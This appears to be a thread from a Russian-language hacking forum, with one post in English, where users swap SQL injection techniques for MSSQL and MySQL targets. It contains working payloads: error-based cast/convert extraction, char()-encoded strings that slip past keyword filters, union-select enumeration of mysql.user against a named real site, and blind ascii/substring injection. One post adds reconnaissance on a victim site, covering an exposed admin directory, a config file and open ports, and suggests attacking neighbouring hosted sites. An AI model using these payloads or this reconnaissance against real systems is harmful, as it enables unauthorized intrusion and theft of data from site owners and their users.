Добрый день Подскажите пожалуйста как вывести в ошибке MSSQL данные типа "int" 1+or+1=(SELECT intColumn ...) не вызывает ошибки в случае если column имеет тип int, только при varchar. Спасибо.
Вопрос: Короче есть бажный параметр mssql-inj. .asp?id=..... Запросы типа -1+or+1=(@@version), db_name() и тд проходят на ура. Скрипт фильтрует операторы (select, update, и тд..). Какие методы обхода фильтраций существуют? В mysql много знаю, а вот s mssql впервые столкнулся.
1 or 1=(SELECT cast(name as nvarchar(4000)) FROM table)-- 1 or 1=(SELECT convert(nvarchar,name) FROM table)--
Оба эти запроса не выдали ошибку :S. Используется mssql в связке с ASP.Net. Microsoft SQL Server 2000 - 8.00.2187 (Intel X86) Mar 9 2006 11:38:51 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
попробуй так 1 or 1=(select convert(int,substring(convert(varchar,name)+char(58),1,999)) from table)--
hi sorry need to write in english http://www.fcmetz.com/voir.php?id=-5036%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13%20from%20mysql.user i got all that and when user http://www.fcmetz.com/voir.php?id=-5036%20union%20select%201,2,3,4,user,6,7,8,9,10,11,12,13%20from%20mysql.user doesnt appear how to move on thanx
Exec тоже под фильтром. Я попробовал сделать так : page.asp?id=-1+or+1=(char(0x73)%2bchar(0x65)%2bchar(0x6c)%2bchar(0x65)%2bchar(0x63)%2bchar(0x74)%2bchar(0x7e)%2b+user)--sp_password Получил: [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'select~dbo' to data type int. Если же попробовать к примеру top 1 table_name from .... , то тут уже нестыковка синтаксиса.
Салют народ =) Прошу помощи. Подобрал поля через order by (скуля),при попытке вывести поля через union select выводит страницу 403 Forbidden Поля подобрал верно стопудофф. Ввожу /page/about_tema.php?id=16+union+select+1,2,3,4,5,6-- и ппц. Что это может быть и как бороться?
Я понимаю, что запрещено. Я спарашиваю почему, и как это обойти. Ведь я могу обращаться к скрипту просто, и при подборе ордер бай тоже могу, всё выводит как надо, но при юнион селект вот такая фигня.
Там фильтры стоят на комбинации union select и прочее. Надо вот так: Code: http://www.site.com/pages/blog_historial.php?MUESBLOG=BLOG&VALOTEMA=107+AND+ascii(lower(substring(version(),1,1)))=53 стоит 5 версия мускула, можно при желании все вытянуть... Code: /home/site/public_html/ путь от корня к WWW Можно просматривать содержимое каталога: Code: http://www.site.com/admin/includes/ Вот сдесь по всей видимости конфигурационные данные Code: http://www.site.com/admin/includes/configuracion.php Система - линукс Открытые порты: 21, 25, 26, 53, 80, 110, 143, 443, 465, 993, 995, 3306 Думаю самый вариант в твоем случае ломать соседние сайты, а их 346 =) PS адресс сайта убрал по просьбе Imperou$
